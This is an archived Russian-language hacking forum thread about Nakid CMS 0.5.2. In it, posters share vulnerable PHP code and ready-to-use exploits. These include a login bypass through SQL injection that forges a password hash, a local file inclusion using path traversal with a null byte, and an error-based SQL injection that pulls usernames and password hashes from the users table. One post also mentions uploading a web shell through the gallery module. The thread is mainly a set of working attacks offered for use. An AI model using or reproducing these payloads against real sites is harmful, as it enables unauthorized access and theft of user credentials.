PDA

Просмотр полной версии : Nakid CMS 0.5.2

geezer.code
20.03.2010, 13:46
NakidCMS 0.5.2

Обход Авторизации && Blind SQLi
login_process.php
mq=off

$post_username = $_POST['username'];
$post_password = md5($_POST['password']);
$users_query = mysql_query("SELECT id,password FROM ".$system_table_prefix."users WHERE username = '".$post_username."' LIMIT 1") or die("<p class='error'>Error: ".mysql_error()."</p>");
if(mysql_num_rows($users_query)<1){
die("<p class='error'>No such user found</p>");
}
$users_array = mysql_fetch_array($users_query);
if($post_password != $users_array['password']){
die("<p class='error'>Invalid Password</p>");
}
$_SESSION['uid'] = $users_array['id'];
echo("Redirecting to home page, if you are not redirected <a href='index.php'>click here</a>");
redirect_page("index.php?p=home");

Exploit:

index.php?p=login_process
POST
username=' union select 1 id,'9003d1df22eb4d3820015070385194c8' password#
password=pwd


P.S.
Заливка шелла через модуль галереи.
RulleR
20.03.2010, 15:41
Local File Inclusion

Vuln file: /index.phpfile:/includes/php/first.php
/*...*/
//Get Current Page
if(!empty($_GET['p'])){
$core['page'] = strtolower($_GET['p']);
}
if(!empty($_GET['pt'])){
$core['page_type'] = strtolower($_GET['pt']);
}
/*...*/
if($core['page_type'] == "core"){
$page_string = "includes/pages/".$core['page'].".php";
if(file_exists($page_string)){
include($page_string);
$page_found = true;
}
}
/*...*/Need: magic_quotes = off
Exploit:
http://[host]/[path]/index.php?pt=core&p=../../../../../../../[local_file]%00

Blind SQL injection

Vuln file: /includes/pages/users_data.php/*...*/
$page = $_GET['page']; //Requested page
$limit = $_GET['rows']; //Num of rows
$sidx = $_GET['sidx']; //Sort by
$sord = $_GET['sord']; //Sort order
/*...*/
$SQL = "SELECT * FROM ".$core['table_prefix']."users";
/*...*/
if(!empty($sidx)){
$SQL .= " ORDER BY ".$sidx." ".$sord;
}
/*...*/Exploit:http://[host]/[path]/includes/pages/users_data.php?sidx=1+and+(1,2)=(select+*+from(sel ect+name_const((select+concat_ws(0x3a,username,pas sword)+from+nakid_users+where+id=1),1),name_const( (select+concat_ws(0x3a,username,password)+from+nak id_users+where+id=1),1))x)
Jokester
23.04.2010, 16:10
слив РОА